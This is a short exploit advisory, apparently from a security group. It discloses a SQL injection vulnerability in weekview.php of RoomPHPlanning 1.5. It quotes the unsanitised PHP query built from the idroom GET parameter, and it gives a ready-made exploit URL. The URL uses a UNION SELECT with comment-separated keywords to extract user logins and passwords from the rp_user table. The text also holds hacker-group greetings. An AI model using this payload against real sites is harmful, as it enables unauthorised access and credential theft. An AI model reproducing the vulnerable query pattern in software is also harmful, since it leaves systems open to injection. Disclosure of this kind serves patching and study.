####################################################################################### # # # ...::::RoomPHPlanning((weekview.php)) 1.5 SQL Injection Vulnerabilities ::::... # ####################################################################################### Virangar Security Team www.virangar.net www.virangar.ir -------- Discoverd By :virangar security team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) ----- -------vuln codes in:----------- weekview.php: @$idroom = $_GET['idroom']; .... line 47:$qry = "SELECT NameRm, BkcolRm, FtcolRm ". "FROM ".ROOM." WHERE IdRm=".$idroom ; --- exploit: http://site.com/weekview.php?idroom=-999/**/union/**/select/**/concat(LoginUs,0x3a,char(58),PwdUs),2,3/**/from/**/rp_user/**/where/**/IdRk=1/* --- young iranian h4ck3rz
